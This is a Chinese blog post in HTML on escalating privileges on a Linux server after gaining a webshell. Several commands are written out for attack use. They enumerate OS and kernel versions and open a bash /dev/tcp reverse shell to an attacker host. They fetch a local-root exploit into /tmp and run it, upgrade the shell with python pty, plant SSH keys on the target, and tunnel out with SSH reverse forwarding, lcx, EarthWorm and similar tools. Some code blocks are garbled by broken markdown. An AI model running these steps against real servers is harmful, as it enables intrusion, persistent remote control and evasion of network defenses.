<!doctype html>



  


<html class="theme-next pisces use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="linux服务器," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />







<meta name="description" content="题外话：如果你对本站文章字体有任何不适，请告知我，我会回复你，字体请让浏览器调到对眼睛舒适的大小;默认不允许转载，除非转载注明出处。

0x00 简介
当攻击者拿到webshell之后，他会为了完全管理控制整个主机系统而去提升自己通过webshell得到的权限。">
<meta property="og:type" content="article">
<meta property="og:title" content="服务器提权之linux">
<meta property="og:url" content="https://shawnleon.github.io/2016/08/08/webshell-linux/index.html">
<meta property="og:site_name" content="THE WEAK ARE HARD TO GET THE FAIR">
<meta property="og:description" content="题外话：如果你对本站文章字体有任何不适，请告知我，我会回复你，字体请让浏览器调到对眼睛舒适的大小;默认不允许转载，除非转载注明出处。

0x00 简介
当攻击者拿到webshell之后，他会为了完全管理控制整个主机系统而去提升自己通过webshell得到的权限。">
<meta property="og:image" content="https://shawnleon.github.io/images/webshell-linux/never-leave.jpg">
<meta property="og:image" content="https://shawnleon.github.io/images/webshell-linux/1.png">
<meta property="og:image" content="https://shawnleon.github.io/images/webshell-linux/3.png">
<meta property="og:image" content="https://shawnleon.github.io/images/webshell-linux/6.png">
<meta property="og:image" content="https://shawnleon.github.io/images/webshell-linux/2.png">
<meta property="og:image" content="https://shawnleon.github.io/images/webshell-linux/4.png">
<meta property="og:image" content="https://shawnleon.github.io/images/webshell-linux/5.png">
<meta property="og:image" content="https://shawnleon.github.io/images/webshell-linux/7.png">
<meta property="og:image" content="https://shawnleon.github.io/images/webshell-linux/8.png">
<meta property="og:image" content="https://shawnleon.github.io/images/webshell-linux/9.png">
<meta property="og:image" content="https://shawnleon.github.io/images/webshell-linux/10.png">
<meta property="og:image" content="https://shawnleon.github.io/images/webshell-linux/11.png">
<meta property="og:image" content="https://shawnleon.github.io/images/webshell-linux/12.png">
<meta property="og:updated_time" content="2016-08-18T00:28:23.213Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="服务器提权之linux">
<meta name="twitter:description" content="题外话：如果你对本站文章字体有任何不适，请告知我，我会回复你，字体请让浏览器调到对眼睛舒适的大小;默认不允许转载，除非转载注明出处。

0x00 简介
当攻击者拿到webshell之后，他会为了完全管理控制整个主机系统而去提升自己通过webshell得到的权限。">
<meta name="twitter:image" content="https://shawnleon.github.io/images/webshell-linux/never-leave.jpg">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"always"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="https://shawnleon.github.io/2016/08/08/webshell-linux/"/>

  <title> 服务器提权之linux | THE WEAK ARE HARD TO GET THE FAIR </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta custom-logo">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">THE WEAK ARE HARD TO GET THE FAIR</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">THE ONLY FAIR IS NOT FAIR</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于我
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-board">
          <a href="/board" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />
            
            留言板
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="st-search-show-outputs">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <form class="site-search-form">
  <input type="text" id="st-search-input" class="st-search-input st-default-search-input" />
</form>

<script type="text/javascript">
  (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){
    (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t);
    e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e);
  })(window,document,'script','//s.swiftypecdn.com/install/v2/st.js','_st');

  _st('install', 'ueXsZP8kWT66wb-z9nvw','2.0.0');
</script>



    </div>
  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                服务器提权之linux
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-08-08T20:41:40+08:00" content="2016-08-08">
              2016-08-08
            </time>
          </span>

          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/08/08/webshell-linux/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2016/08/08/webshell-linux/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
              &nbsp; | &nbsp;
              <span class="page-pv"><i class="fa fa-file-o"></i>
              <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
              </span>
          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><img src="/images/webshell-linux/never-leave.jpg" alt="image"><br><strong>题外话：如果你对本站文章字体有任何不适，请告知我，我会回复你，字体请让浏览器调到对眼睛舒适的大小;默认不允许转载，除非转载注明出处。</strong></p>
<hr>
<h1 id="0x00-简介"><a href="#0x00-简介" class="headerlink" title="0x00 简介"></a>0x00 简介</h1><hr>
<p>当攻击者拿到webshell之后，他会为了完全管理控制整个主机系统而去提升自己通过webshell得到的权限。<br><a id="more"></a><br>提权有两类。</p>
<h2 id="1-水平权限提升"><a href="#1-水平权限提升" class="headerlink" title="1.水平权限提升"></a>1.水平权限提升</h2><p>  攻击者在具有相似权限的账户中平级‘移动’，比如攻击者获得在线银行的账户访问权限，目的是取得更多的金钱（万恶的money），那么攻击者会尝试各种漏洞来取得其他账户的权限。</p>
<h2 id="2-垂直权限提升"><a href="#2-垂直权限提升" class="headerlink" title="2.垂直权限提升"></a>2.垂直权限提升</h2><p>  攻击者的动机通常是完全控制计算机系统，目的就很多了。当攻击者从被攻击获得的用户账户权限到用户权限扩大或者提升到完全管理权限时，就是垂直权限提升。<br>主机分为windows和linux，由于操作系统不同，所以方法也不尽相同，就分为两大类：windows提权和linux提权<br>windows提权又分为系统漏洞提权和第三方服务提权。<br>linux提权有操作系统漏洞提权和第三方服务提权</p>
<hr>
<h2 id="0x01-操作系统漏洞提权"><a href="#0x01-操作系统漏洞提权" class="headerlink" title="0x01 操作系统漏洞提权"></a>0x01 操作系统漏洞提权</h2><hr>
<h3 id="流程"><a href="#流程" class="headerlink" title="流程"></a>流程</h3><blockquote>
<ul>
<li>获取操作系统版本号</li>
<li>搜索exp（根据操作系统版本号）</li>
<li>反弹shell</li>
<li>尝试提权</li>
</ul>
</blockquote>
<p>内核是系统核，发行版是每个社团增加了外围资源（比如用户界面，系统安装，程序更新），所以各发行版的内核可以一致，但发行版采取的各种用户应用方式可能不同。</p>
<h4 id="获取发行版本"><a href="#获取发行版本" class="headerlink" title="获取发行版本"></a>获取发行版本</h4><blockquote>
<ul>
<li>cat /etc/issue</li>
<li>cat /etc/*-release</li>
<li>cat /etc/lsb-release</li>
<li>cat /etc/redhat-release</li>
</ul>
</blockquote>
<h4 id="获取内核版本"><a href="#获取内核版本" class="headerlink" title="获取内核版本"></a>获取内核版本</h4><blockquote>
<ul>
<li>cat /proc/version</li>
<li>uname -a</li>
<li>uname -mrs</li>
<li>rpm -q kernel</li>
<li>dmesg | grep Linux</li>
<li>ls /boot |grep vmlinuz</li>
</ul>
</blockquote>
<h4 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h4><p>上述工作完成后</p>
<p>下一步就是反弹一个交互性的shell，需要有一个外网的服务器。<br>反弹shell有以下几步</p>
<p>外网主机运行<br><figure class="highlight"><figcaption><span>-l -p 8080(监听8080端口)</span></figcaption><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line"></div><div class="line">目标机运行 </div><div class="line">``` /bin/bash -i &gt;&amp; /dev/tcp/10.xxxx/8080 0&lt;&amp;1</div><div class="line">运行程序后即可看到反弹shell的交互模式</div><div class="line"></div><div class="line">在www.exploit.com搜索 `相应的版本号\+local root `</div><div class="line">然后找相应版本号的代码  。 当下载到本地后或者通过webshell上传，即可使用</div><div class="line">当权限拒绝下载时，到神奇的tmp目录就可完成下载。</div><div class="line">按照程序的介绍运行后，通过参看/root 目录下文件来确认是否是root权限</div><div class="line">程序可能不够完美，没有提示符之类的，所以创建一个交互的bash很有必要。</div><div class="line">linux一般会内置python，所以可以通过python 来创建一个交互性强点的bash</div><div class="line"></div><div class="line">```python</div><div class="line">python -c 'import pty; pty.spawn("/bin/bash")'</div></pre></td></tr></table></figure></p>
<p>输入命令后即可创建成功。</p>
<hr>
<h2 id="0x02-第三方服务提权"><a href="#0x02-第三方服务提权" class="headerlink" title="0x02 第三方服务提权"></a>0x02 第三方服务提权</h2><hr>
<p>条件：<br>在第三方服务器有root权限的情况下，可udf提权，具体流程参考windows udf提权。第三方服务器一般都不会有root权限，情况比较少见。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ps aux |root</div></pre></td></tr></table></figure>
<p>可以通过找root执行的服务，再找第三方软件服务来找是否可以利用。</p>
<hr>
<h2 id="0x03-反向连接与端口转发"><a href="#0x03-反向连接与端口转发" class="headerlink" title="0x03 反向连接与端口转发"></a>0x03 反向连接与端口转发</h2><hr>
<p>反弹的shell 有很多不方便，比如vim的部分功能，所以使用ssh连接更好。 </p>
<h3 id="反向连接"><a href="#反向连接" class="headerlink" title="反向连接"></a>反向连接</h3><h4 id="什么是反向连接"><a href="#什么是反向连接" class="headerlink" title="什么是反向连接"></a>什么是反向连接</h4><p><strong>反向连接是指主机A（受控端）主动连接主机B（控制端），在主机A和主机B之间建立一个远程连接，通过这个连<br>接主机B可以主动的向主机A发送一些请求。</strong></p>
<h4 id="为什么需要主机A主动去连接主机B呢？"><a href="#为什么需要主机A主动去连接主机B呢？" class="headerlink" title="为什么需要主机A主动去连接主机B呢？"></a>为什么需要主机A主动去连接主机B呢？</h4><p>这是因为主机A在局域网内，如果没有对主机A进行端口映射，对于主机B来说主机A是不可见的，如果在主机B这<br>边向主机A发送连接请求，这个请求是不可达的。而主机B有自己独立的IP，对于主机A来说是可见的，可以直接向<br>主机B请求连接。</p>
<h4 id="连接流程"><a href="#连接流程" class="headerlink" title="连接流程"></a>连接流程</h4><blockquote>
<ul>
<li>主机A ssh客户端向主机B sshd服务端发送请求，建立远程连接。</li>
<li>主机B sshd服务端创建本地连接很远程连接的映射（反向连接通道）。</li>
<li>主机B ssh客户端向主机B sshd服务端的连接通道发送请求， 建立主机B ssh和主机A sshd的连接。</li>
</ul>
</blockquote>
<h4 id="SSH反向连接的使用"><a href="#SSH反向连接的使用" class="headerlink" title="SSH反向连接的使用"></a>SSH反向连接的使用</h4><p>要建立反向连接，首先在主机A上运行：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ssh -f -N -R 10000:localhost:22 user@Bip</div></pre></td></tr></table></figure></p>
<p>ssh -f -N -R 8080:localhost:22 root@115.159.126.186<br>10000是主机B上的本地连接端口， 22是主机B上远程连接的那个端口， user@Bip是主机B的地址<br>连接上后，会需要输入密码。连接成功后，SSH反向连接就建立起来了。要连接到主机A，在主机B上运行：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ssh lyb@localhost -p 10000</div></pre></td></tr></table></figure>
<p>使用的过程中碰到一个问题， 就是在主机A上发起请求的时候， 需要输入密码。<br>这时候用<strong>ssh public key</strong>的方法来解决</p>
<h4 id="ssh-socks5代理"><a href="#ssh-socks5代理" class="headerlink" title="ssh socks5代理"></a>ssh socks5代理</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ssh -N -D 1081 外网ip</div></pre></td></tr></table></figure>
<p> -N 不登录只代理</p>
<h3 id="端口转发"><a href="#端口转发" class="headerlink" title="端口转发"></a>端口转发</h3><p>有时被叫做隧道，是安全壳(SSH) 为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为，其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址（局域网内部）上的一个端口。</p>
<h4 id="条件"><a href="#条件" class="headerlink" title="条件"></a>条件</h4><p>web服务器在内网中，windows远程桌面的3389端口和linux ssh 的22端口无法连接。<br>web服务器通常情况下可能所处的情况</p>
<blockquote>
<p>1.内网IP80端口通过端口映射到外网IP80端口<br>2.内网的web服务通过外网IP反向代理</p>
</blockquote>
<h4 id="判断"><a href="#判断" class="headerlink" title="判断"></a>判断</h4><p>如何判断web服务器是内网映射还是反向代理呢？</p>
<blockquote>
<p>1.ping 域名<br>2.通过webshell执行ipconfig或者ifconfig</p>
</blockquote>
<h4 id="如何端口转发"><a href="#如何端口转发" class="headerlink" title="如何端口转发"></a>如何端口转发</h4><p>端口转发有很多工具</p>
<h5 id="lcx-（windows）"><a href="#lcx-（windows）" class="headerlink" title="lcx （windows）"></a>lcx （windows）</h5><h6 id="lcx-–lister-51-3389"><a href="#lcx-–lister-51-3389" class="headerlink" title="lcx –lister 51 3389"></a>lcx –lister 51 3389</h6><p>表示在本机上监听51端口，该端口主要是接受被控制计算机3389端口转发过来的数据</p>
<h6 id="lcx-–slave-218-69-51-192-168-80-129-3389"><a href="#lcx-–slave-218-69-51-192-168-80-129-3389" class="headerlink" title="lcx –slave 218.69.. 51 192.168.80.129 3389"></a>lcx –slave 218.69.<em>.</em> 51 192.168.80.129 3389</h6><p>表示将本机IP地址为192.168.80.129的3389端口转发到远程地址为“218.69.<em>.</em>”的51端口。</p>
<h6 id="cmd-mstsc-218-69-3388"><a href="#cmd-mstsc-218-69-3388" class="headerlink" title="cmd mstsc 218.69..:3388"></a>cmd mstsc 218.69.<em>.</em>:3388</h6><h5 id="htran-（）"><a href="#htran-（）" class="headerlink" title="htran （）"></a>htran （）</h5><h5 id="EarthWorm"><a href="#EarthWorm" class="headerlink" title="EarthWorm"></a>EarthWorm</h5><p>在自己外网主机执行<br><code>./ew -s rcsocks -l 1080 -e 8888</code><br>内网主机执行<br>```  ./ew -s rssocks -d 外网ip -e 8888<br>外网会开启一个1080 socks5 代理端口</p>
<h5 id="netsh-windows自带"><a href="#netsh-windows自带" class="headerlink" title="netsh (windows自带)"></a>netsh (windows自带)</h5><h5 id="reGeorgSocksProxy-py"><a href="#reGeorgSocksProxy-py" class="headerlink" title="reGeorgSocksProxy.py"></a>reGeorgSocksProxy.py</h5><h5 id="meterpreter-porfwd-（）"><a href="#meterpreter-porfwd-（）" class="headerlink" title="meterpreter porfwd （）"></a>meterpreter porfwd （）</h5><hr>
<h2 id="0x04-演示"><a href="#0x04-演示" class="headerlink" title="0x04 演示"></a>0x04 演示</h2><hr>
<p><strong>本地搭建环境测试</strong></p>
<h3 id="获取发行版本-1"><a href="#获取发行版本-1" class="headerlink" title="获取发行版本"></a>获取发行版本</h3><p><img src="/images/webshell-linux/1.png" alt="image"></p>
<h3 id="反弹shell-1"><a href="#反弹shell-1" class="headerlink" title="反弹shell"></a>反弹shell</h3><p><img src="/images/webshell-linux/3.png" alt="image"></p>
<h3 id="查看权限是低权限"><a href="#查看权限是低权限" class="headerlink" title="查看权限是低权限"></a>查看权限是低权限</h3><p><img src="/images/webshell-linux/6.png" alt="image"></p>
<h3 id="在www-exploit-db-com-搜索exp，"><a href="#在www-exploit-db-com-搜索exp，" class="headerlink" title="在www.exploit-db.com 搜索exp，"></a>在www.exploit-db.com 搜索exp，</h3><p><img src="/images/webshell-linux/2.png" alt="image"></p>
<h3 id="找到centos7版本的，点开看看，发现是国人写的2333"><a href="#找到centos7版本的，点开看看，发现是国人写的2333" class="headerlink" title="找到centos7版本的，点开看看，发现是国人写的2333~"></a>找到centos7版本的，点开看看，发现是国人写的2333~</h3><p><img src="/images/webshell-linux/4.png" alt="image"></p>
<h3 id="直接curl-下载地址"><a href="#直接curl-下载地址" class="headerlink" title="直接curl 下载地址"></a>直接curl 下载地址</h3><p><img src="/images/webshell-linux/5.png" alt="image"></p>
<h3 id="ls-查看发现没下载，说明权限不够，"><a href="#ls-查看发现没下载，说明权限不够，" class="headerlink" title="ls 查看发现没下载，说明权限不够，"></a>ls 查看发现没下载，说明权限不够，</h3><p><img src="/images/webshell-linux/7.png" alt="image"></p>
<h3 id="cd-到权限777的tmp目录"><a href="#cd-到权限777的tmp目录" class="headerlink" title="cd 到权限777的tmp目录"></a>cd 到权限777的tmp目录</h3><p>然后再curl下载地址<br>查看说明并执行<br><img src="/images/webshell-linux/8.png" alt="image"></p>
<h3 id="成功"><a href="#成功" class="headerlink" title="成功"></a>成功</h3><p><img src="/images/webshell-linux/9.png" alt="image"></p>
<h3 id="查看权限-并用python创建交互性的bash"><a href="#查看权限-并用python创建交互性的bash" class="headerlink" title="查看权限 并用python创建交互性的bash"></a>查看权限 并用python创建交互性的bash</h3><p><img src="/images/webshell-linux/10.png" alt="image"></p>
<p>反弹shell的bash太不好用，不能撤销不能使用方向键不能删除。</p>
<h3 id="尝试ssh连接，免密码登录"><a href="#尝试ssh连接，免密码登录" class="headerlink" title="尝试ssh连接，免密码登录"></a>尝试ssh连接，免密码登录</h3><p>在自己的主机生成公钥私钥，公钥放到目标主机<br><img src="/images/webshell-linux/11.png" alt="image"></p>
<p>由于是外网连接内网所以连接会超时<br><img src="/images/webshell-linux/12.png" alt="image"></p>
<h3 id="尝试端口转发"><a href="#尝试端口转发" class="headerlink" title="尝试端口转发"></a>尝试端口转发</h3><p>end</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/linux服务器/" rel="tag">#linux服务器</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/08/08/markdown/" rel="next" title="makedown 语法小结">
                <i class="fa fa-chevron-left"></i> makedown 语法小结
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/08/09/webshell-windows/" rel="prev" title="服务器提权之windows">
                服务器提权之windows <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        <div class="ds-share flat" data-thread-key="2016/08/08/webshell-linux/"
     data-title="服务器提权之linux"
     data-content=""
     data-url="https://shawnleon.github.io/2016/08/08/webshell-linux/">
  <div class="ds-share-inline">
    <ul  class="ds-share-icons-16">

      <li data-toggle="ds-share-icons-more"><a class="ds-more" href="javascript:void(0);">分享到：</a></li>
      <li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li>
      <li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li>
      <li><a class="ds-qqt" href="javascript:void(0);" data-service="qqt">腾讯微博</a></li>
      <li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li>

    </ul>
    <div class="ds-share-icons-more">
    </div>
  </div>
</div>
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2016/08/08/webshell-linux/"
           data-title="服务器提权之linux" data-url="https://shawnleon.github.io/2016/08/08/webshell-linux/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/1.jpg"
               alt="shawnleon" />
          <p class="site-author-name" itemprop="name">shawnleon</p>
          <p class="site-description motion-element" itemprop="description">People always like the person who are willing to trust them.</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">12</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">11</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/shawnleon" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://twitter.com/copercheung" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://www.weibo.com/3691383884/profile?rightmod=1&wvr=6&mod=personinfo" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-weibo"></i>
                  
                  Weibo
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://www.facebook.com/profile.php?id=100009656739973" target="_blank" title="facebook">
                  
                    <i class="fa fa-fw fa-facebook"></i>
                  
                  facebook
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links/友情链接
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="https://shitoudaren.github.io/" title="shit欧建磊" target="_blank">shit欧建磊</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://leelie.github.io" title="伟伟leelie" target="_blank">伟伟leelie</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://lovexiaofeng.cn/" title="call me小峰" target="_blank">call me小峰</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://scorpoin.github.io" title="大棟の哥" target="_blank">大棟の哥</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://liulangdelmao.github.io/" title="卓卓" target="_blank">卓卓</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://nouername.github.io" title="帅乔飞" target="_blank">帅乔飞</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://zhmy1228.github.io" title="moon明明如月" target="_blank">moon明明如月</a>
                </li>
              
            </ul>
          </div>
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-简介"><span class="nav-number">1.</span> <span class="nav-text">0x00 简介</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-水平权限提升"><span class="nav-number">1.1.</span> <span class="nav-text">1.水平权限提升</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-垂直权限提升"><span class="nav-number">1.2.</span> <span class="nav-text">2.垂直权限提升</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-操作系统漏洞提权"><span class="nav-number">1.3.</span> <span class="nav-text">0x01 操作系统漏洞提权</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#流程"><span class="nav-number">1.3.1.</span> <span class="nav-text">流程</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#获取发行版本"><span class="nav-number">1.3.1.1.</span> <span class="nav-text">获取发行版本</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#获取内核版本"><span class="nav-number">1.3.1.2.</span> <span class="nav-text">获取内核版本</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#反弹shell"><span class="nav-number">1.3.1.3.</span> <span class="nav-text">反弹shell</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-第三方服务提权"><span class="nav-number">1.4.</span> <span class="nav-text">0x02 第三方服务提权</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-反向连接与端口转发"><span class="nav-number">1.5.</span> <span class="nav-text">0x03 反向连接与端口转发</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#反向连接"><span class="nav-number">1.5.1.</span> <span class="nav-text">反向连接</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#什么是反向连接"><span class="nav-number">1.5.1.1.</span> <span class="nav-text">什么是反向连接</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#为什么需要主机A主动去连接主机B呢？"><span class="nav-number">1.5.1.2.</span> <span class="nav-text">为什么需要主机A主动去连接主机B呢？</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#连接流程"><span class="nav-number">1.5.1.3.</span> <span class="nav-text">连接流程</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SSH反向连接的使用"><span class="nav-number">1.5.1.4.</span> <span class="nav-text">SSH反向连接的使用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ssh-socks5代理"><span class="nav-number">1.5.1.5.</span> <span class="nav-text">ssh socks5代理</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#端口转发"><span class="nav-number">1.5.2.</span> <span class="nav-text">端口转发</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#条件"><span class="nav-number">1.5.2.1.</span> <span class="nav-text">条件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#判断"><span class="nav-number">1.5.2.2.</span> <span class="nav-text">判断</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#如何端口转发"><span class="nav-number">1.5.2.3.</span> <span class="nav-text">如何端口转发</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#lcx-（windows）"><span class="nav-number">1.5.2.3.1.</span> <span class="nav-text">lcx （windows）</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#lcx-–lister-51-3389"><span class="nav-number">1.5.2.3.1.1.</span> <span class="nav-text">lcx –lister 51 3389</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#lcx-–slave-218-69-51-192-168-80-129-3389"><span class="nav-number">1.5.2.3.1.2.</span> <span class="nav-text">lcx –slave 218.69.. 51 192.168.80.129 3389</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#cmd-mstsc-218-69-3388"><span class="nav-number">1.5.2.3.1.3.</span> <span class="nav-text">cmd mstsc 218.69..:3388</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#htran-（）"><span class="nav-number">1.5.2.3.2.</span> <span class="nav-text">htran （）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#EarthWorm"><span class="nav-number">1.5.2.3.3.</span> <span class="nav-text">EarthWorm</span></a></li><li class="nav-item 